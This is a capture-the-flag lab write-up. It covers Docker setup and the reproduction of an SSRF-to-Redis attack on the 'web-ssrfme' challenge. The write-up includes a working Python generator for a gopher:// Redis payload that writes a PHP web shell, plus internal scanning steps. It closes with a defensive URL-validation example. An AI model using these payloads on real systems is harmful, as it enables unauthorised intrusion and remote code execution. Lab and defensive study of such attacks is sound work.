1. Docker setup
1.1 Installation
root@abyss:~# apt install docker.io
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
bridge-utils containerd git git-man liberror-perl pigz runc ubuntu-fan
Suggested packages:
ifupdown aufs-tools btrfs-progs cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2 docker-doc rinse zfs-fuse | zfsutils git-daemon-run
| git-daemon-sysvinit git-doc git-email git-gui gitk gitweb git-cvs git-mediawiki git-svn
The following NEW packages will be installed:
bridge-utils containerd docker.io git git-man liberror-perl pigz runc ubuntu-fan
0 upgraded, 9 newly installed, 0 to remove and 67 not upgraded.
Need to get 82.5 MB of archives.
After this operation, 321 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 pigz amd64 2.6-1 [63.6 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 bridge-utils amd64 1.7-1ubuntu3 [34.4 kB]
Get:3 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 runc amd64 1.1.12-0ubuntu2~22.04.1 [8,405 kB]
Get:4 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 containerd amd64 1.7.24-0ubuntu1~22.04.2 [37.3 MB]
Get:5 http://cn.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 docker.io amd64 26.1.3-0ubuntu1~22.04.1 [32.5 MB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 liberror-perl all 0.17029-1 [26.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git-man all 1:2.34.1-1ubuntu1.12 [955 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git amd64 1:2.34.1-1ubuntu1.12 [3,165 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 ubuntu-fan all 0.12.16 [35.2 kB]
Fetched 82.5 MB in 2min 48s (490 kB/s)
Preconfiguring packages ...
Selecting previously unselected package pigz.
(Reading database ... 211881 files and directories currently installed.)
Preparing to unpack .../0-pigz_2.6-1_amd64.deb ...
Unpacking pigz (2.6-1) ...
Selecting previously unselected package bridge-utils.
Preparing to unpack .../1-bridge-utils_1.7-1ubuntu3_amd64.deb ...
Unpacking bridge-utils (1.7-1ubuntu3) ...
Selecting previously unselected package runc.
Preparing to unpack .../2-runc_1.1.12-0ubuntu2~22.04.1_amd64.deb ...
Unpacking runc (1.1.12-0ubuntu2~22.04.1) ...
Selecting previously unselected package containerd.
Preparing to unpack .../3-containerd_1.7.24-0ubuntu1~22.04.2_amd64.deb ...
Unpacking containerd (1.7.24-0ubuntu1~22.04.2) ...
Selecting previously unselected package docker.io.
Preparing to unpack .../4-docker.io_26.1.3-0ubuntu1~22.04.1_amd64.deb ...
Unpacking docker.io (26.1.3-0ubuntu1~22.04.1) ...
Selecting previously unselected package liberror-perl.
Preparing to unpack .../5-liberror-perl_0.17029-1_all.deb ...
Unpacking liberror-perl (0.17029-1) ...
Selecting previously unselected package git-man.
Preparing to unpack .../6-git-man_1%3a2.34.1-1ubuntu1.12_all.deb ...
Unpacking git-man (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package git.
Preparing to unpack .../7-git_1%3a2.34.1-1ubuntu1.12_amd64.deb ...
Unpacking git (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package ubuntu-fan.
Preparing to unpack .../8-ubuntu-fan_0.12.16_all.deb ...
Unpacking ubuntu-fan (0.12.16) ...
Setting up runc (1.1.12-0ubuntu2~22.04.1) ...
Setting up liberror-perl (0.17029-1) ...
Setting up bridge-utils (1.7-1ubuntu3) ...
Setting up pigz (2.6-1) ...
Setting up git-man (1:2.34.1-1ubuntu1.12) ...
Setting up containerd (1.7.24-0ubuntu1~22.04.2) ...
Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service.
Setting up ubuntu-fan (0.12.16) ...
Created symlink /etc/systemd/system/multi-user.target.wants/ubuntu-fan.service → /lib/systemd/system/ubuntu-fan.service.
Setting up docker.io (26.1.3-0ubuntu1~22.04.1) ...
Adding group `docker' (GID 137) ...
Done.
Created symlink /etc/systemd/system/multi-user.target.wants/docker.service → /lib/systemd/system/docker.service.
Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket.
Setting up git (1:2.34.1-1ubuntu1.12) ...
Processing triggers for man-db (2.10.2-1) ...
1.2 Configuration
Create a systemd drop-in for docker.service so that dockerd pulls images through the HTTP proxy at 192.168.142.1:7897 (the environment variables below apply to the daemon, not to the containers it runs):
root@abyss:~# cd /etc/systemd/system/
root@abyss:/etc/systemd/system# ls -all
total 128
drwxr-xr-x 21 root root 4096 4月 7 15:58 .
drwxr-xr-x 5 root root 4096 4月 5 23:55 ..
drwxr-xr-x 2 root root 4096 9月 11 2024 bluetooth.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 cloud-final.service.wants
lrwxrwxrwx 1 root root 42 4月 5 23:50 dbus-fi.w1.wpa_supplicant1.service -> /lib/systemd/system/wpa_supplicant.service
lrwxrwxrwx 1 root root 37 4月 5 23:50 dbus-org.bluez.service -> /lib/systemd/system/bluetooth.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.Avahi.service -> /lib/systemd/system/avahi-daemon.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.ModemManager1.service -> /lib/systemd/system/ModemManager.service
lrwxrwxrwx 1 root root 53 4月 5 23:50 dbus-org.freedesktop.nm-dispatcher.service -> /lib/systemd/system/NetworkManager-dispatcher.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.oom1.service -> /lib/systemd/system/systemd-oomd.service
lrwxrwxrwx 1 root root 44 4月 5 23:50 dbus-org.freedesktop.resolve1.service -> /lib/systemd/system/systemd-resolved.service
lrwxrwxrwx 1 root root 36 4月 5 23:50 dbus-org.freedesktop.thermald.service -> /lib/systemd/system/thermald.service
lrwxrwxrwx 1 root root 45 4月 5 23:50 dbus-org.freedesktop.timesync1.service -> /lib/systemd/system/systemd-timesyncd.service
lrwxrwxrwx 1 root root 32 4月 5 23:50 display-manager.service -> /lib/systemd/system/gdm3.service
drwxr-xr-x 2 root root 4096 9月 11 2024 display-manager.service.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 emergency.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 final.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 getty.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 graphical.target.wants
drwxr-xr-x 2 root root 4096 4月 9 11:10 multi-user.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 network-online.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 oem-config.service.wants
drwxr-xr-x 2 root root 4096 4月 5 23:55 open-vm-tools.service.requires
drwxr-xr-x 2 root root 4096 9月 11 2024 paths.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 printer.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 rescue.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 sleep.target.wants
-rw-r--r-- 1 root root 311 9月 11 2024 snap-bare-5.mount
-rw-r--r-- 1 root root 326 9月 11 2024 snap-core22-1612.mount
-rw-r--r-- 1 root root 326 4月 7 15:58 snap-core22-1802.mount
drwxr-xr-x 2 root root 4096 4月 7 15:58 snapd.mounts.target.wants
-rw-r--r-- 1 root root 329 9月 11 2024 snap-firefox-4848.mount
-rw-r--r-- 1 root root 344 9月 11 2024 'snap-gnome\x2d42\x2d2204-176.mount'
-rw-r--r-- 1 root root 359 9月 11 2024 'snap-gtk\x2dcommon\x2dthemes-1535.mount'
-rw-r--r-- 1 root root 326 9月 11 2024 snap-snapd-21759.mount
-rw-r--r-- 1 root root 380 9月 11 2024 'snap-snapd\x2ddesktop\x2dintegration-178.mount'
-rw-r--r-- 1 root root 380 4月 7 15:58 'snap-snapd\x2ddesktop\x2dintegration-253.mount'
-rw-r--r-- 1 root root 338 9月 11 2024 'snap-snap\x2dstore-1113.mount'
-rw-r--r-- 1 root root 338 4月 7 15:58 'snap-snap\x2dstore-1216.mount'
drwxr-xr-x 2 root root 4096 4月 9 11:10 sockets.target.wants
lrwxrwxrwx 1 root root 31 4月 5 23:57 sshd.service -> /lib/systemd/system/ssh.service
lrwxrwxrwx 1 root root 9 4月 5 23:50 sudo.service -> /dev/null
drwxr-xr-x 2 root root 4096 4月 5 23:54 sysinit.target.wants
lrwxrwxrwx 1 root root 35 4月 5 23:50 syslog.service -> /lib/systemd/system/rsyslog.service
drwxr-xr-x 2 root root 4096 4月 6 00:37 timers.target.wants
lrwxrwxrwx 1 root root 41 4月 5 23:55 vmtoolsd.service -> /lib/systemd/system/open-vm-tools.service
root@abyss:/etc/systemd/system# mkdir docker.service.d
root@abyss:/etc/systemd/system# cd docker.service.d/
root@abyss:/etc/systemd/system/docker.service.d# ls -all
total 8
drwxr-xr-x 2 root root 4096 4月 9 11:11 .
drwxr-xr-x 22 root root 4096 4月 9 11:11 ..
root@abyss:/etc/systemd/system/docker.service.d# vim http-proxy.conf
root@abyss:/etc/systemd/system/docker.service.d# cat http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://192.168.142.1:7897"
Environment="HTTPS_PROXY=http://192.168.142.1:7897"
Environment="NO_PROXY=localhost,127.0.0.1,*.example.com"
root@abyss:/etc/systemd/system/docker.service.d#
1.3 Restart Docker and test
root@abyss:/etc/systemd/system/docker.service.d# systemctl daemon-reload
root@abyss:/etc/systemd/system/docker.service.d# systemctl restart docker
root@abyss:/etc/systemd/system/docker.service.d# ps -ef | grep docker
root 6029 1 2 11:32 ? 00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 6184 4730 0 11:32 pts/1 00:00:00 grep --color=auto docker
# try searching for nginx with docker to confirm the proxy works
root@abyss:/etc/systemd/system/docker.service.d# docker search nginx
NAME DESCRIPTION STARS OFFICIAL
nginx Official build of Nginx. 20738 [OK]
nginx/nginx-ingress NGINX and NGINX Plus Ingress Controllers fo… 103
nginx/nginx-prometheus-exporter NGINX Prometheus Exporter for NGINX and NGIN… 49
nginx/unit This repository is retired, use the Docker o… 65
nginx/nginx-ingress-operator NGINX Ingress Operator for NGINX and NGINX P… 2
nginx/nginx-quic-qns NGINX QUIC interop 1
nginx/nginxaas-loadbalancer-kubernetes 1
nginx/unit-preview Unit preview features 0
bitnami/nginx Bitnami container image for NGINX 199
ubuntu/nginx Nginx, a high-performance reverse proxy & we… 128
bitnamicharts/nginx Bitnami Helm chart for NGINX Open Source 0
rancher/nginx 2
kasmweb/nginx An Nginx image based off nginx:alpine and in… 8
linuxserver/nginx An Nginx container, brought to you by LinuxS… 229
dtagdevsec/nginx T-Pot Nginx 0
paketobuildpacks/nginx 0
vmware/nginx 2
chainguard/nginx Build, ship and run secure software with Cha… 4
droidwiki/nginx 0
gluufederation/nginx A customized NGINX image containing a consu… 1
intel/nginx 0
circleci/nginx This image is for internal use 2
corpusops/nginx https://github.com/corpusops/docker-images/ 1
antrea/nginx Nginx server used for Antrea e2e testing 0
docksal/nginx Nginx service image for Docksal 0
2. SSRF lab setup
2.1 Prepare and extract the files
root@abyss:~# ls -all
total 3004
drwx------ 6 root root 4096 4月 8 20:19 .
drwxr-xr-x 20 root root 4096 4月 5 23:52 ..
-rw-r--r-- 1 root root 3015411 4月 8 20:19 web-ssrfme.tar.gz
root@abyss:~# mkdir web_ssrf
root@abyss:~# ls -all
drwxr-xr-x 2 root root 4096 4月 9 10:59 web_ssrf
root@abyss:~# mv web-ssrfme.tar.gz web_ssrf/
root@abyss:~# ls -all
drwxr-xr-x 2 root root 4096 4月 9 10:59 web_ssrf
root@abyss:~# cd web_ssrf/
root@abyss:~/web_ssrf# ls -all
total 2956
drwxr-xr-x 2 root root 4096 4月 9 10:59 .
drwx------ 7 root root 4096 4月 9 10:59 ..
-rw-r--r-- 1 root root 3015411 4月 8 20:19 web-ssrfme.tar.gz
root@abyss:~/web_ssrf# tar -zxvf web-ssrfme.tar.gz
root@abyss:~/web_ssrf# ls -all
total 2960
drwxr-xr-x 3 root root 4096 4月 9 10:59 .
drwx------ 7 root root 4096 4月 9 10:59 ..
drwxr-xr-x 4 root root 4096 2月 23 2022 web-ssrfme
-rw-r--r-- 1 root root 3015411 4月 8 20:19 web-ssrfme.tar.gz
root@abyss:~/web_ssrf# cd web-ssrfme/
root@abyss:~/web_ssrf/web-ssrfme# ls -all
total 20
drwxr-xr-x 4 root root 4096 2月 23 2022 .
drwxr-xr-x 3 root root 4096 4月 9 10:59 ..
-rw-r--r-- 1 root root 168 2月 17 2022 docker-compose.yml
drwxr-xr-x 3 root root 4096 2月 23 2022 redis
drwxr-xr-x 4 root root 4096 2月 17 2022 web
2.2 Bring up the environment
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Command 'docker-compose' not found, but can be installed with:
snap install docker # version 27.5.1, or
apt install docker-compose # version 1.29.2-1 // recommended; the snap method above tends to cause problems
See 'snap info docker' for additional versions.
// docker-compose is not installed, so install it
root@abyss:~/web_ssrf/web-ssrfme# apt install docker-compose
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools python3-texttable
python3-websocket
Suggested packages:
python-attr-doc python-jsonschema-doc python-setuptools-doc
The following NEW packages will be installed:
docker-compose python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools
python3-texttable python3-websocket
0 upgraded, 12 newly installed, 0 to remove and 67 not upgraded.
Need to get 911 kB of archives.
After this operation, 4,842 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 python3-distutils all 3.10.8-1~22.04 [139 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-websocket all 1.2.3-1 [34.7 kB]
Get:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docker all 5.0.3-1 [89.3 kB]
Get:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dockerpty all 0.4.1-2 [11.1 kB]
Get:5 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docopt all 0.6.2-4 [26.9 kB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dotenv all 0.19.2-1 [20.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-attr all 21.2.0-1 [44.0 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 python3-setuptools all 59.6.0-1.2ubuntu0.22.04.2 [340 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-pyrsistent amd64 0.18.1-1build1 [55.5 kB]
Get:10 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-jsonschema all 3.2.0-0ubuntu2 [43.1 kB]
Get:11 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-texttable all 1.6.4-1 [11.4 kB]
Get:12 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 docker-compose all 1.29.2-1 [95.8 kB]
Fetched 911 kB in 2s (602 kB/s)
Selecting previously unselected package python3-distutils.
(Reading database ... 213203 files and directories currently installed.)
Preparing to unpack .../00-python3-distutils_3.10.8-1~22.04_all.deb ...
Unpacking python3-distutils (3.10.8-1~22.04) ...
Selecting previously unselected package python3-websocket.
Preparing to unpack .../01-python3-websocket_1.2.3-1_all.deb ...
Unpacking python3-websocket (1.2.3-1) ...
Selecting previously unselected package python3-docker.
Preparing to unpack .../02-python3-docker_5.0.3-1_all.deb ...
Unpacking python3-docker (5.0.3-1) ...
Selecting previously unselected package python3-dockerpty.
Preparing to unpack .../03-python3-dockerpty_0.4.1-2_all.deb ...
Unpacking python3-dockerpty (0.4.1-2) ...
Selecting previously unselected package python3-docopt.
Preparing to unpack .../04-python3-docopt_0.6.2-4_all.deb ...
Unpacking python3-docopt (0.6.2-4) ...
Selecting previously unselected package python3-dotenv.
Preparing to unpack .../05-python3-dotenv_0.19.2-1_all.deb ...
Unpacking python3-dotenv (0.19.2-1) ...
Selecting previously unselected package python3-attr.
Preparing to unpack .../06-python3-attr_21.2.0-1_all.deb ...
Unpacking python3-attr (21.2.0-1) ...
Selecting previously unselected package python3-setuptools.
Preparing to unpack .../07-python3-setuptools_59.6.0-1.2ubuntu0.22.04.2_all.deb ...
Unpacking python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Selecting previously unselected package python3-pyrsistent:amd64.
Preparing to unpack .../08-python3-pyrsistent_0.18.1-1build1_amd64.deb ...
Unpacking python3-pyrsistent:amd64 (0.18.1-1build1) ...
Selecting previously unselected package python3-jsonschema.
Preparing to unpack .../09-python3-jsonschema_3.2.0-0ubuntu2_all.deb ...
Unpacking python3-jsonschema (3.2.0-0ubuntu2) ...
Selecting previously unselected package python3-texttable.
Preparing to unpack .../10-python3-texttable_1.6.4-1_all.deb ...
Unpacking python3-texttable (1.6.4-1) ...
Selecting previously unselected package docker-compose.
Preparing to unpack .../11-docker-compose_1.29.2-1_all.deb ...
Unpacking docker-compose (1.29.2-1) ...
Setting up python3-dotenv (0.19.2-1) ...
Setting up python3-distutils (3.10.8-1~22.04) ...
Setting up python3-attr (21.2.0-1) ...
Setting up python3-texttable (1.6.4-1) ...
Setting up python3-docopt (0.6.2-4) ...
Setting up python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Setting up python3-pyrsistent:amd64 (0.18.1-1build1) ...
Setting up python3-websocket (1.2.3-1) ...
Setting up python3-dockerpty (0.4.1-2) ...
Setting up python3-docker (5.0.3-1) ...
Setting up python3-jsonschema (3.2.0-0ubuntu2) ...
Setting up docker-compose (1.29.2-1) ...
Processing triggers for man-db (2.10.2-1) ...
// bring up the environment
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Creating network "web-ssrfme_default" with the default driver
Building redis
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
Install the buildx component to build images with BuildKit:
https://docs.docker.com/go/buildx/
Sending build context to Docker daemon 7.983MB
Step 1/19 : FROM ubuntu:16.04
16.04: Pulling from library/ubuntu
58690f9b18fc: Pull complete
b51569e7c507: Pull complete
da8ef40b9eca: Pull complete
fb15d46c38dc: Pull complete
......
Successfully built 4be6c24dabe9
Successfully tagged ctf/ssrfme:latest
WARNING: Image for service web was built because it did not already exist. To rebuild this image you must use `docker-compose build` or `docker-compose up --build`.
Creating web-ssrfme_redis_1 ... done
Creating web-ssrfme_web_1 ... done
// check the ports Docker mapped
root@abyss:~/web_ssrf/web-ssrfme# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8da4dc9e2730 ctf/ssrfme "/bin/sh -c 'cd /; .…" 3 minutes ago Up 3 minutes 0.0.0.0:8091->80/tcp, :::8091->80/tcp web-ssrfme_web_1
d05b13308fc8 web-ssrfme_redis "/usr/local/bin/dock…" 3 minutes ago Up 3 minutes 6379/tcp web-ssrfme_redis_1
root@abyss:~/web_ssrf/web-ssrfme#
2.3 Access test
2.3.1 Checking that the environment is up
Browse to <VM IP address>:<Docker mapped port> (port 8091 in the docker ps output above). If you see the code shown above, the environment is set up correctly.
3. Vulnerability analysis and reproduction
3.1 Testing for SSRF
The source exposes a url GET parameter. Requesting www.baidu.com through it gives the result shown above, confirming the SSRF. The remaining steps are to determine the internal network range, find which internal hosts are alive, and then use unauthenticated Redis access to write a file and obtain the flag.
3.2 Obtaining the internal IP range
The source calls phpinfo(), triggered by the info parameter, which prints the host's IP address. Trying it:
The host IP printed here is 172.18.0.3, so the internal subnet is 172.18.0.x. Next, detect which hosts on that subnet are alive.
3.3 Internal host detection
Brute-forcing the range with Yakit shows that the host at 172.18.0.2 is alive and is running an HTTP service.
Knowing a live host is not enough; we still need an entry point, so use the SSRF to scan its ports and see whether a Redis service is present.
3.4 Port scanning
Scanning ports with Yakit shows that port 6379 responds with -ERR wrong number of arguments for 'get' command, which is a Redis error. That error means 172.18.0.2 is also running Redis, so a Redis unauthenticated access attack can be attempted.
3.5 Redis unauthenticated access attack
The host 172.18.0.2 runs both HTTP and Redis, so we attack the unauthenticated Redis instance: first write a payload onto 172.18.0.2, then use the SSRF to request that payload directly so it executes and returns the flag.
3.5.1 Writing the payload
Since 172.18.0.2 runs HTTP, first test whether the payload can be written directly into the html directory.
The payload generation script:
import urllib.parse

protocol = "gopher://"
ip = "172.18.0.2"  # internal host running redis
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "web.php"
path = "/var/www/html/upload"
passwd = ""
# Redis commands: store the PHP in a key, point the RDB dump at the web root,
# then SAVE so the dump file is written as a .php file.
cmd = [
    "flushall",
    "set 1 {}".format(shell.replace(" ", "${IFS}")),  # placeholder keeps spaces out of split()
    "config set dir {}".format(path),
    "config set dbfilename {}".format(filename),
    "save",
]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))

payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # Encode one command in the RESP protocol: *<argc>\r\n then $<len>\r\n<arg>\r\n per argument
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len(x.replace("${IFS}", " "))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)
URL-encode the output a second time, because the payload is URL-decoded twice on the way in: once by the browser and once by Redis. As shown below:
However, the html directory does not appear to be directly writable; there was no response at all when this was tested:
Browsing to the file afterwards only shows the following, confirming the write failed:
3.5.2 Scanning the host
Since the payload cannot be written directly into the html directory, scan 172.18.0.2 with Burp Suite to see whether html contains any other directory that would allow the payload to be written.
Scan results:
There is an upload directory, so next test writing the payload there.
3.5.3 Writing the payload again
This time a tool is used to generate the payload. Gopherus is an open-source tool on GitHub, but as of 2025 it is fairly old and depends on Python 2, which therefore has to be installed on Ubuntu. Once installed, it is used as follows:
After obtaining the payload, double URL-encode it again and write it using the same method. I then looked inside the container and the file shell.php was already present.
Browsing to ?url=http://172.18.0.2/upload/shell.php then returns the flag.
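As an added example (not part of this writeup or the challenge's code), here is the defender-side check the vulnerable url parameter is missing: it rejects the two things the chain above depends on, a non-HTTP scheme such as gopher:// reaching Redis on 6379, and any destination that resolves into the container network. The resolver and its DNS entries are constructed stubs so the code runs offline; real code would resolve with socket.getaddrinfo and connect to the validated address.

```python
"""Allow-list check for a user-supplied fetch URL (added example, not the
challenge's own code). Rejects non-HTTP schemes, unexpected ports and any
host whose resolved addresses are not globally routable."""
import ipaddress
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed stub DNS table; the second entry models a host that returns one
# public and one internal record (the DNS-rebinding / split-answer case).
STUB_DNS = {
    "www.baidu.com": ["39.156.66.10"],
    "evil.example": ["93.184.216.34", "172.18.0.2"],
}


def stub_resolve(host: str) -> List[str]:
    """Stand-in for socket.getaddrinfo: literal IPs pass through, names use STUB_DNS."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        return STUB_DNS.get(host, [])


def is_internal(ip: str) -> bool:
    # is_global is False for RFC1918 (172.18.0.x), loopback, link-local,
    # CGNAT, multicast and reserved ranges, so one test covers them all.
    return not ipaddress.ip_address(ip).is_global


def check_fetch_url(url: str,
                    resolve: Callable[[str], List[str]] = stub_resolve) -> Tuple[bool, str]:
    """Return (allowed, reason). Every resolved address must be global."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    addrs = resolve(parts.hostname)
    if not addrs:
        return False, "unresolvable host"
    for ip in addrs:
        if is_internal(ip):
            return False, "%s resolves to internal address %s" % (parts.hostname, ip)
    return True, "ok"
```

Rejecting a single internal record is deliberate: an attacker-controlled name that answers with one public and one internal address must fail closed, and the fetcher should connect to the address it validated rather than re-resolving.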